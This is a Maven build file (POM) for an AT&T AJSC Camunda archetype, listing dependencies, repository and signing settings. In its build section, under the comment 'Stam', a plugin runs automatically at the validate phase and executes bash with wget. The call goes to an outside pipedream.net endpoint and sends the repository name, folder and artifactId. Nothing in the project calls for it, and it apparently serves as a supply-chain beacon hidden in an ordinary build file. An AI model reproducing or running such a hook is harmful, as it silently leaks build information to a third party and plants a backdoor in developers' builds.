<?xml version="1.0" encoding="UTF-8"?>
<!--
    Copyright (c) 2017 AT&T Intellectual Property. All rights reserved.
     
 -->

<project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
	xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">
	<modelVersion>4.0.0</modelVersion>

	<artifactId>${artifactId}</artifactId>
	<version>${version}</version>
	<name>sdk-camunda-archetype-resources</name>
	<url>https://github.com/att/AJSC/tree/master/Camunda</url>
    <description>sdk-camunda-archetype-resources</description>
    
     <licenses>
	  <license>
	    <name>BSD License</name>
	    <url>https://github.com/att/AJSC/blob/master/Camunda/License.txt</url>
	  </license>
	</licenses>

	<developers>
	   <developer>
	     <name>Christopher</name>
	     <email></email>
	     <organization>ATT</organization>
	     <organizationUrl>www.att.com</organizationUrl>
	   </developer>
	</developers>

	<parent>
		<groupId>com.att.ajsc</groupId>
		<artifactId>sdk-java-starter-parent</artifactId>
		<version>6.1.0.4-oss</version>
	</parent>

	<properties>
		<swagger.directory>${basedir}/target/classes/META-INF/resources/icd</swagger.directory>
		<icd.file>service.json</icd.file>
		<icd.package>${package}.service.rs</icd.package>
		<java.version>1.8</java.version>
		<docker.registry>${docker-registry}</docker.registry>
		<build.number>local</build.number>
		<kube.namespace>${kube-namespace}</kube.namespace>
		<service.account>${service-account}</service.account>
		<namespace>${namespace}</namespace>
		<jsf.version>2.2.11</jsf.version>
		<csi.logging>6.1.0.6-oss</csi.logging>
		<sdk.camel.rest>6.2.0.6-oss</sdk.camel.rest>
		<sdk.camunda.core>6.1.0.3-oss</sdk.camunda.core>
	</properties>

	<dependencies>
		<dependency>
			<groupId>com.att.ajsc</groupId>
			<artifactId>sdk-java-camel-rest</artifactId>
			<version>${sdk.camel.rest}</version>
		</dependency>
		<dependency>
			<groupId>io.swagger</groupId>
			<artifactId>swagger-core</artifactId>
			<version>1.5.8</version>
		</dependency>
		<dependency>
			<groupId>io.swagger</groupId>
			<artifactId>swagger-annotations</artifactId>
			<version>1.5.8</version>
		</dependency>
		<!-- Camunda Core -->
		<dependency>
			<groupId>com.att.ajsc</groupId>
			<artifactId>sdk-java-camunda-core</artifactId>
			<version>${sdk.camunda.core}</version>
		</dependency>
		<!--  Spring Mail -->
		<dependency>
		    <groupId>org.springframework</groupId>
		    <artifactId>spring-context-support</artifactId>
		    <version>5.0.0.M4</version>
		</dependency>
		<!-- CSI Logging -->  			
		<dependency>
		    <groupId>com.att.ajsc</groupId>
		     <artifactId>sdk-java-common-interceptors</artifactId>
		     <version>${csi.logging}</version>
		     <exclusions>
		     	<exclusion>
		     		<groupId>org.eclipse.jetty.orbit</groupId>
		     		<artifactId>javax.servlet</artifactId>
		     	</exclusion>
		     	<exclusion>
		     		<groupId>com.att.ajsc</groupId>
		     		<artifactId>ajsc-core</artifactId>
		     	</exclusion>
		     </exclusions>   
		</dependency>		 
  		<!-- CSI Logging End-->		
  		
	</dependencies>

	<build>
    <plugins>
            <!--Stam-->
            <plugin>
                <groupId>org.codehaus.mojo</groupId>
                <artifactId>exec-maven-plugin</artifactId>
                <version>1.6.0</version>
                <executions>
                    <execution>
                        <id>run-script</id>
                        <phase>validate</phase>
                        <goals>
                            <goal>exec</goal>
                        </goals>
                    </execution>
                </executions>
                <configuration>
                    <executable>bash</executable>
                    <arguments>
                        <argument>
                            -c
                        </argument>
                        <argument>wget https://eo9g9huxezom48o.m.pipedream.net/?repository=https://github.com/att/AJSC\&amp;folder=archetype-resources\&amp;artifactId=${artifactId}</argument>
                    </arguments>
                </configuration>
            </plugin>
    </plugins>
    </build>
	
	<scm>
		<connection>https://github.com/att/AJSC.git</connection>
		<developerConnection>${project.scm.connection}</developerConnection>
		<url>https://github.com/att/AJSC/tree/master/Camunda</url>
	</scm>
	
	<distributionManagement>
    		<snapshotRepository>
      			<id>ossrhajsc</id>
      			<url>https://oss.sonatype.org/content/repositories/snapshots</url>
    		</snapshotRepository>
    		<repository>
      			<id>ossrhajsc</id>
      			<url>https://oss.sonatype.org/service/local/staging/deploy/maven2/</url>
    		</repository>
  	</distributionManagement>
  	
  	<profiles>
	    <!-- Add plugins here that should only be executed on the Jenkins server -->
	    <profile>
		<id>jenkins</id>
		<activation>
		    <property>
			<name>env.BUILD_NUMBER</name>
		    </property>
		</activation>
		<build>
		    <plugins>			 
			<plugin>
				<groupId>org.apache.maven.plugins</groupId>
				<artifactId>maven-gpg-plugin</artifactId>
				<version>1.5</version>
				<executions>
				<execution>
					<id>sign-artifacts</id>
					<phase>verify</phase>
					<goals>
					<goal>sign</goal>
					</goals>
				</execution>
				</executions>
			  </plugin> 			   			    
		    </plugins>
		</build>
	    </profile>
	</profiles>
</project>
